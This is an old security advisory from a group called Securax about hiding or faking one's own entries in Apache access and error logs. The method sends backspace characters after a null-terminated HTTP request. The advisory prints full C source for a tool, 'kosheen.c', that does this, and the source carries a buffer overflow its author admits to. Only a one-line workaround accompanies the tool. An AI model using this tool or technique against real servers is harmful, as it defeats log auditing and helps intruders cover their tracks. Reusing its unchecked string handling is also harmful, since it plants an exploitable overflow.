scx-sa-12.txt

`=============================================================================  
Securax-SA-12 Security Advisory  
belgian.networking.security Dutch  
=============================================================================  
Topic: Remote hiding from access_log and error_log  
Announced: 2000-12-28  
Affects: Logfile auditing with tools that print the contents of the  
file to the screen.  
=============================================================================  
  
  
Note: This entire advisory has been based upon trial and error results. We  
can not ensure the information below is 100% correct. This document  
is subject to change without prior notice.  
  
If you happen to find more information, solutions, ... about the below  
problem or further varients please contact me on the following email  
[email protected], or you can contact the Securax crew by e-mail at  
[email protected].  
  
  
I. Problem Description  
-----------------------  
  
When the backspace charachter is sent, after a NULL terminated request, we   
will get a answer, the page we requested, but our entry in the access_log   
file is kinda altered. We can overwrite our IP address when someone wantsto  
cat the logfile to the screen or maybe also to a device (such as: /dev/lp0),   
althougt.. this cat to 'devices' thing is not tested by me, but will someone  
ever print his entire access_log? I don't think so.  
  
So, this can only be done when some site administrator is checking his logs  
with 'cat' or 'tail' or such, which is often used in addition with grep.  
  
  
Example  
-------  
  
1.)  
[incubus:~]$ nc 10.0.0.4 80  
GET /index.php HTTP/1.0  
<html>  
<head>  
...  
content (output) of index.php  
...  
[incubus:~]$  
  
2.)   
[incubus:~]$ ./localghost 10.0.0.4 index.php  
<html>  
<head>  
...  
content (output) of index.php  
...  
[incubus:~]$  
  
  
Hmm.. not very interesting eh? Well, let's take a look at the webserver's  
side:  
  
  
1.)   
[root@test logs]# tail -n 1 access_log  
10.0.0.2 - - [27/Dec/2000:04:42:26 +0100] "GET /index.php HTTP/1.0" 200 2362  
/* 10.0.0.2 is the IP of the attacker */  
  
2.)  
[root@test logs]# tail -n 1 access_log  
31.3.3.7 - - [31/Feb/1492:01:23:45 +3133] "GET /index.htm HTTP/1.1" 200 2362   
  
  
Unfortunaltely, if you open access_log in any decent editor, it will notice  
the '\x08' chars ( \x08 == backspace), and display 'em as dots.  
  
If you want to display a fake ip address, you'll have to calculate the length   
of the entry in the log file. I suggest you keep the fake ipaddress as *real*  
as can be, because 31.3.3.7 is more suspicious than, let's say 207.46.230.229  
  
  
II. Impact  
----------  
  
  
This is not really a vulnerability, but it can be used in cgi scanners   
or something, i don't know. This source was coded and compiled on a   
slack7 linux (2.2.17) box, and tested against a Apache 1.3.14 server.  
  
/* --| BOF |-- */  
  
/*  
kosheen.c - hides you from logfiles  
-----------------------------------  
"i'll hide you, away from danger"; -kosheen, 2000  
  
This will display false values in a remote site's access_log  
and error_log. Read Securax Advisory #12 for more info.  
(http://securax.org/pers/scx-sa-12.txt)  
  
Got the title of this source from the radio, and guess what song   
they were playing. :)  
  
All my love to Tessa.  
Maximum respect to vorlon, cicero, root-dude, lamagra, f0bic, Zoa,  
zymo, sentinel, woshy, bob, suPC, uptx, and all great ppl i forgot...  
  
by:  
incubus  
<[email protected]>  
*/  
  
#include <stdio.h>   
#include <sys/types.h>   
#include <sys/socket.h>   
#include <netinet/in.h>   
#include <netdb.h>   
int usage(char *progname);  
int main(int argc, char **argv){  
int sock, i;  
char buf[4096]; /* change this value !! */  
struct sockaddr_in sin;   
struct hostent *he;  
if (argc < 3) usage(argv[0]);  
if ((he=gethostbyname(argv[1])) == NULL){  
fprintf(stderr, "Unknown host\n\n");  
exit(1);  
}  
sock = socket(AF_INET, SOCK_STREAM, 0);  
if (sock < 0) herror("oops: ");  
sin.sin_family = AF_INET;   
sin.sin_addr = *((struct in_addr *)he->h_addr);   
sin.sin_port = htons(80);   
bzero(buf, sizeof(buf));   
strncpy (buf,"GET /", 5);  
strcat (buf, argv[2]); /* okay.. overflow this buffer and get a  
errm.. crappy non-suid shell! :)   
So, don't mailbomb me this is overflowable */  
  
strncat (buf," HTTP/1.0\x00", 14);   
for (i=0; i< 600; i++) strncat(buf,"\x08", 1); /* change the 600  
if you are using   
quiet large url's */  
/*  
Uncomment next line (and change) if you want a fake address displayed  
strcat (buf,"31.3.3.7 - - [31/Feb/1492:01:23:45 +3133] \"GET /index.htm HTTP/1.1");  
*/  
  
strncat (buf,"\r\n\r\n", 4);   
if (connect(sock,(struct sockaddr *) &sin ,sizeof(sin)) < 0){  
herror("connect() failed\n");  
exit(1);  
}  
send(sock, buf, sizeof(buf), 0);   
bzero(buf,sizeof(buf));  
recv(sock, buf, sizeof(buf), 0);  
printf ("%s", buf);  
close(sock);  
}  
  
int usage(char *progname)  
{  
fprintf (stderr, "\nHmm.. Better use it like this: \n");  
fprintf (stderr, "\t%s <server> <page>\n", progname);  
fprintf (stderr, "\tWhere: <server> is the hostname.\n\t ");  
fprintf (stderr, "<page> is the file you want.\n");  
fprintf (stderr, " by incubus\n <[email protected]>\n");  
exit(1);  
}  
  
/* --| EOF |-- */  
  
  
III. possible workarounds  
-------------------------  
  
possible workarounds :: - Don't use 'cat' and 'tail' (and similars) for  
logfile checking, but a good editor.  
  
IV credits  
----------  
As mentioned in the .c file:   
Tessa, vorlon, cicero, zoa, F_F, rootdude, t-omicr0n, toshywoshy, segfault,   
f0bic, lamagra, steven, zymot1c, sentinel, [--bob--], alien, axxess, telar,  
prizm, {} and devilish.  
  
Also greets to the many, many people i forgot to mention.  
  
hmm.. kinda thanks to the people of kosheen for the name. :)  
  
incubus ([email protected]).  
  
============================================================================  
For more information [email protected]  
Website http://www.securax.org  
Advisories/Text http://www.securax.org/pers  
----------------------------------------------------------------------------  
  
`